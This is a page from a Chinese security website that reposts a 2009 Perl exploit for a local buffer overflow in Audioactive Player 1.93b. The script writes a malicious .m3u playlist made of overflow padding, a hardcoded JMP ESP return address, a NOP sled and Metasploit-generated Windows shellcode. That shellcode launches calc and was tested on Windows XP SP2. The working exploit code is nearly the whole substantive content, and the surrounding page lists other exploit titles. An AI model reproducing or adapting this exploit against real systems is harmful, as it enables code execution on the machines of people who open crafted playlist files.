首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Audioactive Player 1.93b (.m3u) Local Buffer Overflow Exploit
来源:hack4love@hotmail.com 作者:hack4love 发布时间:2009-05-18  
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# Audioactive player v1.93b (.m3u) Local buffer Overflow Exploit
# Greetz to all my friends
# From EGYPT
##################################################################
my $bof="\x41" x 224;
my $ret="\xed\x1e\x94\x7c"; # JMP ESP ntdll.dll
my $nop="\x90" x 24;
##################################################################
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
"\xac\xdf\x53\x83\xeb\xfc\xe2\xf4\xda\x44\x9b\x53\x26\xac\x54\x16".
"\x1a\x27\xa3\x56\x5e\xad\x30\xd8\x69\xb4\x54\x0c\x06\xad\x34\x1a".
"\xad\x98\x54\x52\xc8\x9d\x1f\xca\x8a\x28\x1f\x27\x21\x6d\x15\x5e".
"\x27\x6e\x34\xa7\x1d\xf8\xfb\x57\x53\x49\x54\x0c\x02\xad\x34\x35".
"\xad\xa0\x94\xd8\x79\xb0\xde\xb8\xad\xb0\x54\x52\xcd\x25\x83\x77".
"\x22\x6f\xee\x93\x42\x27\x9f\x63\xa3\x6c\xa7\x5f\xad\xec\xd3\xd8".
"\x56\xb0\x72\xd8\x4e\xa4\x34\x5a\xad\x2c\x6f\x53\x26\xac\x54\x3b".
"\x1a\xf3\xee\xa5\x46\xfa\x56\xab\xa5\x6c\xa4\x03\x4e\x5c\x55\x57".
"\x79\xc4\x47\xad\xac\xa2\x88\xac\xc1\xcf\xbe\x3f\x45\xac\xdf\x53";
##################################################################
open(myfile,'>>hack4love.m3u');
print myfile $bof.$ret.$nop.$shellcode;
# Tested on: Windows XP Pro SP2 (EN)
##################################################################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jieqi CMS versions 1.5 and bel
·Harland Scripts 11 Products Re
·linux/x86-64 setuid(0) + execv
·Audioactive Player 1.93b (.m3u
·2daybiz Template Monster Clone
·freebsd/x86-64 execve /bin/sh
·2daybiz Business Community Scr
·Microsoft IIS 6.0 WebDAV Remot
·StrawBerry 1.1.1 LFI / Remote
·PHPenpals <= 1.1 (mail.php ID)
·Linux Kernel 2.6.29 ptrace_att
·Basic differences between x86
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved